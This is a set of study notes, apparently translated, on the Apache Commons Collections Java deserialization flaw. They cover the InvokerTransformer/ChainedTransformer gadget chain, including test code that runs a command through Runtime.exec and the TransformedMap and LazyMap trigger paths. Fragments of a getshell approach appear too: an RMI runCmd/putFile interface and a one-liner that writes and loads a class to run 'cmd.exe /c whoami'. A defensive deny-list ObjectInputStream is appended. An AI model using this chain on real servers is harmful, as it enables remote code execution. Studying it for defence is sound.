UI class -> getshell: wl.connect(Host, Port); this is the deserialized class.
Create our remote class and implement two methods in it: one executes a system command and returns its output, the other writes a text file. The class must extend the java.rmi.Remote interface (RMI methods must also declare RemoteException). The code is as follows:
Interface:
import java.rmi.Remote;
import java.rmi.RemoteException;

public interface InitApp extends Remote {
    String runCmd(String cmd) throws RemoteException;
    String putFile(String content, String path) throws RemoteException;
}
Then upload and register:
byte[] payload = GenPayload.gen("Windows", b);
SendPayload.send(host, port, payload);
The getOutputStream method returns the byte output stream created by the servlet engine, which can write the response body as raw bytes.
================================================================================
byte[] payload = First_payload.gen_firstpayload("Windows");
Transformer[] transformers = { ... }   // the exploit chain
Upload binary code
Upload into the directory the program is running in; one-liner: new FileOutputStream("./payload.class").write(new byte[]{0x.., 0x.., ...})
The following one-liner then executes it:
java.net.URLClassLoader.class.getConstructor(java.net.URL[].class).newInstance(new java.net.URL[]{new java.net.URL("file:./")}).loadClass("payload").newInstance("cmd.exe /c whoami")
================================================================================
Key functions of the Java reflection mechanism:
getClass()
clz.getMethod("foo", String.class)
Test code:
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;

@SuppressWarnings({"rawtypes", "unchecked"})
public class VulTest {
    public static void main(String[] args) {
        Transformer transform = new InvokerTransformer( // InvokerTransformer object, named transform
            "append",                                   // method name resolved by reflection on the input object
            new Class[]{String.class},                  // parameter types
            new Object[]{"ExploitCat"});                // arguments
        // transform() calls input.getClass().getMethod("append", String.class).invoke(input, "ExploitCat")
        Object newObject = transform.transform(new StringBuffer("Your name is "));
        System.out.println(newObject);
    }
}
Test code 1:
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

@SuppressWarnings({"rawtypes", "unchecked"})
public class TransformTest {
    public static void main(String[] args) {
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class), // NSFOCUS's chain starts from java.net.URLClassLoader.class
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, // NSFOCUS: getConstructor; java.lang.Class.getConstructor() returns a Constructor object
                new Object[]{"getRuntime", new Class[0]}), // NSFOCUS: newInstance
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, // NSFOCUS: loadClass
                new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class}, // NSFOCUS: getMethod
                new Object[]{"calc"})
        };
        // NSFOCUS's chain has one more invoke step after this.
        Transformer chain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        innerMap.put("name", "Hello");
        Map outerMap = TransformedMap.decorate(innerMap, null, chain); // decorate method
        Map.Entry elEntry = (Map.Entry) outerMap.entrySet().iterator().next();
        elEntry.setValue("Hello"); // setValue on the entry runs checkSetValue. Why? Just know that setValue needs checkSetValue first; the name says it all. Like PHP, where login() calls checkLogin() to decide; sometimes you understand it from a different angle, 2333.
    }
}
What calls these transform methods is the decorate method of a class called TransformedMap.
Look at the decorate method:
public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
    return new TransformedMap(map, keyTransformer, valueTransformer);
}
Parsing: the first argument is the Map object (innerMap); the second is the key transformer (null in the test above, so keys are left alone); the third is the value transformer (chain), which is applied to values, i.e. the value side of key/value.
================================================================================
The problem is in InvokerTransformer.transform.
Two triggers for the vulnerability:
TransformedMap.checkSetValue(Object) trigger
LazyMap.get(Object) trigger
sun.reflect.annotation.AnnotationInvocationHandler
LazyMap.get:
Not yet confirmed whether the path is: LazyMap.get -> TransformedMap.decorate -> sun.reflect.annotation.AnnotationInvocationHandler
An object is an instantiated class.
Statement from the article:
Here you should be able to understand why the foreign researchers use a dynamic proxy to construct the POC.
Because AnnotationInvocationHandler implements the InvocationHandler interface by default,
after a dynamic proxy is generated with Object isWin = Proxy.newProxyInstance(classLoader, interfaces, invocationHandler),
the InvocationHandler.invoke(xx) method is called whenever a method is invoked on the object isWin.
So the POC execution flow is map.xx -> proxy(map).invoke -> LazyMap.get(xx), which triggers the transform method and executes the malicious code.
Here ChainedTransformer is the chain of Transformers; it executes the Transformers we defined. This part is relatively simple; if interested, read the source yourself.
TransformedMap.checkSetValue:
The article says:
So here the POC execution flow is TransformedMap -> AnnotationInvocationHandler.readObject() -> setValue() -> checkSetValue(), and the vulnerability is triggered successfully.
checkSetValue and setValue
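As an added defensive example (not code from these notes or from the referenced articles), the hardened stream below cuts off both trigger paths above at class-resolution time: the Commons Collections functor/map classes and AnnotationInvocationHandler are rejected before any readObject() runs, and dynamic proxies (needed for the LazyMap.get path) are refused outright. The deny-list prefixes are an assumption to be extended per application; in Java 9+ the same policy can also be expressed with ObjectInputFilter.

```java
import java.io.*;
import java.util.*;

public class HardenedObjectInputStream extends ObjectInputStream {
    // Deny list (assumption: extend per application). functors.* holds InvokerTransformer,
    // ChainedTransformer and ConstantTransformer; map.* holds TransformedMap and LazyMap.
    private static final List<String> DENIED_PREFIXES = Arrays.asList(
        "org.apache.commons.collections.functors.",
        "org.apache.commons.collections.map.",
        "org.apache.commons.collections4.functors.",
        "org.apache.commons.collections4.map.",
        "sun.reflect.annotation.AnnotationInvocationHandler");

    public HardenedObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    /** True when the class name from the stream matches a denied prefix. */
    public static boolean isDenied(String className) {
        for (String prefix : DENIED_PREFIXES) {
            if (className.startsWith(prefix)) return true;
        }
        return false;
    }

    // Called for every non-proxy class descriptor before the object is instantiated,
    // so the gadget chain is rejected before AnnotationInvocationHandler.readObject() can run.
    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        if (isDenied(desc.getName())) {
            throw new InvalidClassException(desc.getName(), "rejected by deserialization deny list");
        }
        return super.resolveClass(desc);
    }

    // The LazyMap.get path needs a dynamic proxy in the stream; refuse proxies entirely.
    @Override
    protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
        throw new InvalidClassException("java.lang.reflect.Proxy", "dynamic proxies are not accepted");
    }

    public static void main(String[] args) throws Exception {
        // Constructed input: a harmless HashMap still round-trips through the hardened stream.
        Map<String, String> m = new HashMap<>();
        m.put("name", "Hello");
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(m); }
        try (ObjectInputStream ois = new HardenedObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            System.out.println("accepted: " + ois.readObject());
        }
        System.out.println("InvokerTransformer denied: "
            + isDenied("org.apache.commons.collections.functors.InvokerTransformer"));
    }
}
```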
http://drops.wooyun.org/papers/10467
http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/
https://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/
20160509 - a first pass at cleaning up the principle of the Java Apache Commons deserialization vulnerability